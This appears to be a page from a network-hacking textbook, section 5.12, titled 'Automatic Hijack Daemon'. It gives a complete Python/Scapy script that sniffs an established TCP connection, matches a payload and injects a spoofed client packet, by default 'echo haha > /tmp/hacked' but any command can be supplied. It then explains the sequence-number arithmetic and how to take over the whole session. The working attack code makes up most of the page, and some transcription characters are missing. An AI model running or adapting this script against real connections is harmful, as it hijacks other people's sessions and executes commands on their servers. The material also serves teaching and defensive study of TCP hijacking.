Menu
Home
Log in / Register
 
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

5.12 Automatic Hijack Daemon

The creme de la creme of a TCP hijacking toolkit is a mechanism to inject custom commands into an existing TCP connection. You can choose for it to happen either interactively like in Ettercap (ettercap.sourceforge.net) or automatically like in P.A.T.H. (p-a-t-h.sourceforge.net).

Since the author of this book is also one of the authors of the P.A.T.H. project we will implement a daemon that will wait for a certain payload and than automatically hijack that connection. So let's go 'n get it!

1 #!/usr/bin/python

2

3 import sys

4 import getopt

5 from scapy.all import send, sniff, IP, TCP

6

7

8 dev = "eth0"

9 srv_port = None

10 srv_ip = None

11 client_ip = None

12 grep = None

13 inject_data = "echo 'haha' > /tmp/hacked "

14 hijack_data = {}

15

16

17 def handle_packet(packet):

18 ip = packet.getlayer("IP")

19 tcp = packet.getlayer("TCP")

20 flags = tcp.sprintf("%flags%")

21

22 print "Got packet %s:%d -> %s:%d [%s]" % (ip.src,

23 tcp.sport,

24 ip.dst,

25 tcp.dport,

26 flags)

27

28 # Check if this is a hijackable packet

29 if tcp.sprintf("%flags%") == "A" or

30 tcp.sprintf("%flags%") == "PA":

31 already_hijacked = hijack_data.get(ip.dst, {})

32 .get('hijacked')

33

34 # The packet is from server to client

35 if tcp.sport == srv_port and

36 ip.src == srv_ip and

37 not already_hijacked:

38

39 print "Got server sequence " + str(tcp.seq)

40 print "Got client sequence " + str(tcp.ack) + " "

41

42 # Found the payload?

43 if grep in str(tcp.payload):

44 hijack_data.setdefault(ip.dst, {})

45 ['hijack'] = True

46 print "Found payload " + str(tcp.payload)

47 elif not grep:

48 hijack_data.setdefault(ip.dst, {})

49 ['hijack'] = True

50

51 if hijack_data.setdefault(ip.dst, {})

52 .get('hijack'):

53

54 print "Hijacking %s:%d -> %s:%d" % (ip.dst,

55 tcp.dport,

56 ip.src,

57 srv_port)

58

59 # Spoof packet from client

60 packet = IP(src=ip.dst, dst=ip.src) /

61 TCP(sport=tcp.dport,

62 dport=srv_port,

63 seq=tcp.ack + len(inject_data),

64 ack=tcp.seq + 1,

65 flags="PA") /

66 inject_data

67

68 send(packet, iface=dev)

69

70 hijack_data[ip.dst]['hijacked'] = True

71

72

73 def usage():

74 print sys.argv[0]

75 print """

76 -c <client_ip> (optional)

77 -d <data_to_inject> (optional)

78 -g <payload_to_grep> (optional)

79 -i <interface> (optional)

80 -p <srv_port>

81 -s <srv_ip>

82 """

83 sys.exit(1)

84

85 try:

86 cmd_opts = "c:d:g:i:p:s:"

87 opts, args = getopt.getopt(sys.argv[1:], cmd_opts)

88 except getopt.GetoptError:

89 usage()

90

91 for opt in opts:

92 if opt[0] == "-c":

93 client_ip = opt[1]

94 elif opt[0] == "-d":

95 inject_data = opt[1]

96 elif opt[0] == "-g":

97 grep = opt[1]

98 elif opt[0] == "-i":

99 dev = opt[1]

100 elif opt[0] == "-p":

101 srv_port = int(opt[1])

102 elif opt[0] == "-s":

103 srv_ip = opt[1]

104 else:

105 usage()

106

107 if not srv_ip and not srv_port:

108 usage()

109

110 if client_ip:

111 print "Hijacking TCP connections from %s to " +

112 "%s on port %d" % (client_ip,

113 srv_ip,

114 srv_port)

115

116 filter = "tcp and port " + str(srv_port) +

117 " and host " + srv_ip +

118 "and host " + client_ip

119 else:

120 print "Hijacking all TCP connections to " +

121 "%s on port %d" % (srv_ip,

122 srv_port)

123

124 filter = "tcp and port " + str(srv_port) +

125 " and host " + srv_ip

126

127 sniff(iface=dev, store=0, filter=filter, prn=handle_packet)

The main functionality of the program is implemented in the function handle_packet(). Here we firstly check if the intercepted packet has got the ACK or the ACK and PUSH flags set. This tells us that it belongs to an established connection. Next we have a look at the IP addresses and determine if the packet was sent from the server to the client. We are only interested in those packets, because we want to inject our own code to the server. If we got such a packet we try to match the packets payload with the payload we expect. In case it matches, we construct a packet that looks like it has been sent by the client by flipping the ips and ports, use the acknowledgment number as sequence number, because we remember the acknowledgment number is the sequence number that the source expects next and add the length of our payload to it. For every byte sent the sequence number gets increased by one. As acknowledgment number we just use the sniffed sequence number plus one, because this would be the next sequence number we would expect if we cared about the ongoing connection.

Theoretically we could inject more than one packet thus taking over the whole connection. The client is then not able to use it anymore. From their point of view it will hang, because it will always send ACK packages with a sequence number that is too low. This can, under circumstances, lead to ugly ACK storms, because the server sends a RST packet back for every packet, but the client keeps sending its old sequence numbers. In our example we shall not care about it, but the experienced reader can extend the script to send the client a RST packet and terminate its connection to avoid such ACK storms.

Last but not least, it should be noted that you might need to append an to the payload depending on the protocol, otherwise it could be that it is only written onto screen but not executed like in Telnet.

 
Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
 
Subjects
Accounting
Business & Finance
Communication
Computer Science
Economics
Education
Engineering
Environment
Geography
Health
History
Language & Literature
Law
Management
Marketing
Philosophy
Political science
Psychology
Religion
Sociology
Travel